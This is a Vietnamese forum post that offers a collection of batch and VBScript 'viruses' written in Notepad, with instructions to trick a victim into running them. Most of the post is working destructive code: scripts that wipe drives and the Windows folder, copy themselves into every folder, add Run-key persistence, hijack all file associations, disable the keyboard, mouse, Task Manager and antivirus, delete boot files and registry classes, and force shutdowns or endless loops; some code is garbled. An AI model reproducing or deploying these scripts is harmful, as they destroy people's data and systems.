Tạo Virus đơn giản bằng notepad

Go down

Tạo Virus đơn giản bằng notepad

Bài gửi  Khang Joker on Thu 16 Jul - 15:08

PHẦN 1


Cách tạo virus bằng notepad

Nói là virus nhưng thực chất nó ko phải là virus, nó chỉ là một đoạn mã để thực hiện một điều gì đó "nham hiểm"  do chúng ta viết ra. Chính vì thế "hầu hết" các đoạn mã trong đây đều ko bị antivirus chém nên các bạn yên tâm

Mình sẽ cho các bạn một số code để các bạn biết về cấu tạo của nó chứ mình khuyên các bạn không nên dùng nó đem đi phá hoại người khác và các bạn muốn biết hoạt động của nó như thế nào thì minh khuyên các bạn nên cài đặt máy ảo hoặc đóng băng các ổ trước khi sử dụng những con virus này.

1.
-B1: vào notepad gõ cú pháp:
while true
wend
-B2: Sau đó lưu lại dưới đuôi* .vbs
-B3: gửi victim (nạn nhân) dụ cho victim chạy tập tin này( đừng có gắng thử nhé….không chịu trách nhiệm đâu đấy)

Đây mới chỉ là virut, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%, core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn hơn 10 thì thôi rồi, chỉ có cài lại win.
2. Xóa toàn bộ ổ C: của Victim
if exist C:program files*.* deltree /y C:program files*.*
if exist C:my documents*.* deltree /y C:my documents*.*
if exist C:windowsdesktop*.* deltree /y C:windowsdesktop*.*
if exist C:windowsstart menue*.* deltree /y C:windowsstart menue*.*
if exist C:windowscommand*.* deltree /y C:windowscommand*.*
if exist C:windowssystem*.* deltree /y C:windowssystem*.*
if exist C:windows*.* deltree /y C:windows*.*
-Lưu với tên .bat
3.
Trích dẫn:
msgbox"Die roai !" ‘Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nha
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& " vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersio nRu ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %"
On Error Resume Next
Const vic = "D:"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:windows"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

– Lưu với tên .bat
4.
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersio nRu n","wscript.exe "&popo.GetSpecialFolder(0)& "popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
msgbox"May tinh cua ban bi nhiem virut",,"Danger"
msgbox"May se bi lag trong 2s",,"Danger"
msgbox"Ban con 1s",,"Danger"
msgbox"Ban con 0s",,"Danger"
msgbox"May da bi nhiem virus",,"Danger"
Me.visible=false
App.Taskvisible=false
Do
Me.visible=false
App.Taskvisible=false
treomay.run "notepad",false
loop
– Lưu với tên .vbs

Cái này của ông tui vừa làm xong mở nó lên thì dĩ nhiên là treo, nhưng một điều nữa là Ram bị quá tải và lỗi, màn hình đen tui, restart lại không ăn thua vẫn đen thui như đứt bóng….
khắc phục sao đây?
5. Thông báo vĩnh cửu
msgbox "Đừng có tắt dòng thông báo này đi nếu không bạn sẽ gặp rắc rối đó!",,"Thông báo từ Hacker Microsoft"
msgbox "Định làm liều à, thử tắt lần nữa xem!",,"Thông báo từ Hacker Microsoft"
do
msgbox "Error! Máy tính của bạn đã bị các Hacker tấn công!",,"Thông báo từ Hacker Microsoft"
Loop

– Lưu với tên .vbs
6.
start 1.bat
-Lưu với tên 1.bat

-khoa điện tử-máy tính mình nên tổ chức cuộc thì "Xem ai nhanh hơn nào!!" để coi ai tắt thằng này nhanh nhất….khữa … Khữa
7. Tạo thư mục liên tục mỗi khi bấm
‘Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "—Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

Thuốc giải 7.
B1: Mở Notepad
B2: Gõ code:
‘Thuoc Giai !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
‘Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")
‘COP.write VBCopy
‘Set CAP=fso.CreateTextFile(f1.path & "—Virus !!!!!!!.vbs")
‘CAP.write VBCopy
‘Set ATT=fso.GetFolder(f1.Path)
‘ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "—Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub

– Lưu với tên .vbs
8.
-B1: tạo 1 file bất kỳ(1.txt, 1.bat, 1.exe…v..v..)
Vd: C:UserschuongDesktop1.txt
-B2: vào notepad
-B3 :Đánh lệnh erase C:UserschuongDesktop1.txt
-B4: lưu dưới dạng *.cmd
-B5: Chạy file *.cmd
thế là file 1.txt đã bị xóa

Các bạn đang tự hỏi ủa thế có gì đâu mà gọi là phá hoại?????
xin thưa rằng, files chạy dưới đuôi.cmd là thao tác thực hiện trên ms-dos vì vậy nó không kiêng nể ai hết…chỉ thực thi mệnh lệnh 1 cách hiệu quả thôi
-Bởi vậy….nếu bạn thay lệnh erase C:UserschuongDesktop1.txt –>>>>erase C:Windows thì bạn nghĩ thế nào….có phải là đi tong cái win không……..Bởi vậy đừng cố gắng làm điều gì ngu ngốc nhé!!!!!

PHẦN 2

Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:

1) virus phá hoại cửa sổ windown:
Code:
@echo off
msg *virus activated*
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c " "
2)loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập tin:
code:
@echo off
prompt $P $G
assoc .doc = fA1luRe
assoc .docx = fA1luRe
assoc .log = fA1luRe
assoc .msg = fA1luRe
assoc .pages = fA1luRe
assoc .rtf = fA1luRe
assoc .txt = fA1luRe
assoc .wpd = fA1luRe
assoc .wps = fA1luRe
assoc .accdb = fA1luRe
assoc .blg = fA1luRe
assoc .csv = fA1luRe
assoc .dat = fA1luRe
assoc .db = fA1luRe
assoc .efx = fA1luRe
assoc .mdb = fA1luRe
assoc .pdb = fA1luRe
assoc .pps = fA1luRe
assoc .ppt = fA1luRe
assoc .pptx = fA1luRe
assoc .sdb = fA1luRe
assoc .sdf = fA1luRe
assoc .sql = fA1luRe
assoc .vcf = fA1luRe
assoc .wks = fA1luRe
assoc .xls = fA1luRe
assoc .xlsx = fA1luRe
assoc .xml = fA1luRe
assoc .bmp = fA1luRe
assoc .gif = fA1luRe
assoc .jpg = fA1luRe
assoc .png = fA1luRe
assoc .psd = fA1luRe
assoc .psp = fA1luRe
assoc .thm = fA1luRe
assoc .tif = fA1luRe
assoc .ai = fA1luRe
assoc .drw = fA1luRe
assoc .eps = fA1luRe
assoc .ps = fA1luRe
assoc .svg = fA1luRe
assoc .3dm = fA1luRe
assoc .dwg = fA1luRe
assoc .dxf = fA1luRe
assoc .pln = fA1luRe
assoc .indd = fA1luRe
assoc .pct = fA1luRe
assoc .pdf = fA1luRe
assoc .qxd = fA1luRe
assoc .qxp = fA1luRe
assoc .rels = fA1luRe
assoc .aac = fA1luRe
assoc .aif = fA1luRe
assoc .iff = fA1luRe
assoc .m3u = fA1luRe
assoc .mid = fA1luRe
assoc .mp3 = fA1luRe
assoc .mpa = fA1luRe
assoc .ra = fA1luRe
assoc .wav = fA1luRe
assoc .wma = fA1luRe
assoc .3g2 = fA1luRe
assoc .3gp = fA1luRe
assoc .asf = fA1luRe
assoc .asx = fA1luRe
assoc .avi = fA1luRe
assoc .flv = fA1luRe
assoc .mov = fA1luRe
assoc .mp4 = fA1luRe
assoc .mpg = fA1luRe
assoc .rm = fA1luRe
assoc .swf = fA1luRe
assoc .vob = fA1luRe
assoc .wmv = fA1luRe
assoc .asp = fA1luRe
assoc .cer = fA1luRe
assoc .csr = fA1luRe
assoc .css = fA1luRe
assoc .htm = fA1luRe
assoc .html = fA1luRe
assoc .js = fA1luRe
assoc .jsp = fA1luRe
assoc .php = fA1luRe
assoc .rss = fA1luRe
assoc .tvpi = fA1luRe
assoc .tvvi = fA1luRe
assoc .xhtml = fA1luRe
assoc .fnt = fA1luRe
assoc .fon = fA1luRe
assoc .otf = fA1luRe
assoc .ttf = fA1luRe
assoc .8bi = fA1luRe
assoc .plugin = fA1luRe
assoc .xll = fA1luRe
assoc .cab = fA1luRe
assoc .cpl = fA1luRe
assoc .cur = fA1luRe
assoc .dll = fA1luRe
assoc .dmp = fA1luRe
assoc .drv = fA1luRe
assoc .key = fA1luRe
assoc .lnk = fA1luRe
assoc .sys = fA1luRe
assoc .cfg = fA1luRe
assoc .ini = fA1luRe
assoc .keychain = fA1luRe
assoc .prf = fA1luRe
assoc .app = fA1luRe
assoc .bat = fA1luRe
assoc .cgi = fA1luRe
assoc .com = fA1luRe
assoc .exe = fA1luRe
assoc .pif = fA1luRe
assoc .vb = fA1luRe
assoc .ws = fA1luRe
assoc .7z = fA1luRe
assoc .deb = fA1luRe
assoc .gz = fA1luRe
assoc .pkg = fA1luRe
assoc .rar = fA1luRe
assoc .sit = fA1luRe
assoc .sitx = fA1luRe
assoc .tar.gz = fA1luRe
assoc .zip = fA1luRe
assoc .zipx = fA1luRe
assoc .bin = fA1luRe
assoc .hqx = fA1luRe
assoc .mim = fA1luRe
assoc .uue = fA1luRe
assoc .c = fA1luRe
assoc .cpp = fA1luRe
assoc .dtd = fA1luRe
assoc .java = fA1luRe
assoc .pl = fA1luRe
assoc .bak = fA1luRe
assoc .bup = fA1luRe
assoc .gho = fA1luRe
assoc .ori = fA1luRe
assoc .tmp = fA1luRe
assoc .dmg = fA1luRe
assoc .iso = fA1luRe
assoc .toast = fA1luRe
assoc .vcd = fA1luRe
assoc .gam = fA1luRe
assoc .nes = fA1luRe
assoc .rom = fA1luRe
assoc .sav = fA1luRe
assoc .dbx = fA1luRe
assoc .msi = fA1luRe
assoc .part = fA1luRe
assoc .torrent = fA1luRe
assoc .yps = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%AppDataRoamingMicrosoftWindowsSt art MenuProgramsStartup
copy setup.bat %windir%System32
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v fA1luRe /t REG_SZ /d %windir%System32setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
3)kiểm tra % của CPU lên đến bao nhiêu %:
bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là 1.bat rồi ngay lập tức % CPU sẽ tăng lên.
4)lặp lại nhiều lần chu kỳ mess:
Code:
@ECHO off
:Begin
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
GOTO BEGIN
VD:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em ne ?
msg * buon ngu chua anh ?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN
5)tự động tắt máy và kèm theo lời nhắn:
Code:
@echo off
msg * lời cảnh báo
shutdown -c “lời cảnh báo” -s
VD:
@echo off
msg * I LOVE YOU
shutdown -c “Error! tam biet anh!” -s
Còn đây là một số con virus có đuôi là .VBS

6)Chức năng gửi thông điệp cảnh báo:
Code:
text1=msgbox("Thông điêp cảnh báo",42,"Tên thông điệp cảnh báo")
7)Chức năng làm đứng máy tính:
Code:
msgbox"Error !"
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& " vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersio nRu ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %"
On Error Resume Next
Const vic = "D:"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:windows"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
CoolĐây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "—Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub
Còn đây là thuốc giải:
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
‘Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs")
‘COP.write VBCopy
‘Set CAP=fso.CreateTextFile(f1.path & "—Virus !!!!!!!.vbs")
‘CAP.write VBCopy
‘Set ATT=fso.GetFolder(f1.Path)
‘ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "—Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub
10)chức năng mở một thông điệp rồi sẽ tự động tắt máy:
Code:
@echo off
msg * thông điệp
shutdown -c "thông điệp" -s -t 10
11)không cho victim khởi động máy:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
12)Disable NAV:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINESystemCurrentControlSetServic
esNorton Program
SchedulerStart"
wsh.RegWrite s1,3, "REG_DWORD"
13)hiển thị message mỗi khi restart máy:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLMSoftwareMicrosoftWindowsCurrentVersionWin
Logon"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "lời cảnh báo"
wsh.RegWrite s1+s3, "lời cảnh báo"
14)chuc nang hien thi dong lenh khi ban click vao floder:
Code:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT*Shell\","loi canh bao"
reg.regwrite "HKEY_CLASSES_ROOTfoldershellloi canh bao","SLM"
vd:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT*Shell\","Hi ! Ban da bi nhiem WK tu truongton.net"
reg.regwrite "HKEY_CLASSES_ROOTfoldershellHi ! Ban da bi nhiem WK tu truongton.net","SLM"
15)Xóa Registry Files:
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm loi canh bao.
GOTO MESSAGE
vd:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE
16)Bật notepad lien tuc lam may tinh bi ngơ:
Code:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
17)bật tắt caps lock liên tục:
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
18)Ép enter liên tục:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
ep Backspace lien tuc:
MsgBox "Let’s go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Còn đây là một số con virus có đuôi .cmd:
1)Xóa sạch tất cả các file có trong máy:
Code:
DEL /F /Q *
2)Xóa một file nào đó:
Code:
erase đường dẫn
vd:
erase C:TEST.txt
3)Ẩn tòan bộ file trong win
Code:
ATTRIB +S /F /Q *
Thế là xong phù mệt quá chúc các bạn vui vẻ với những con virus này nếu có con mới mình sẽ post lên cho các bạn thưởng thức.

Tổng hợp từ các nguồn khác nhau…

devuong

_________________
lol! Admin Khang Joker lol!
avatar
Khang Joker
Đế Vương - Khang Gia
Đế Vương - Khang Gia

Tổng số bài gửi : 17
Like : 1
Join date : 15/07/2015
Age : 18
Đến từ : Việt Nam

Xem lý lịch thành viên

Về Đầu Trang Go down

Về Đầu Trang


 
Permissions in this forum:
Bạn không có quyền trả lời bài viết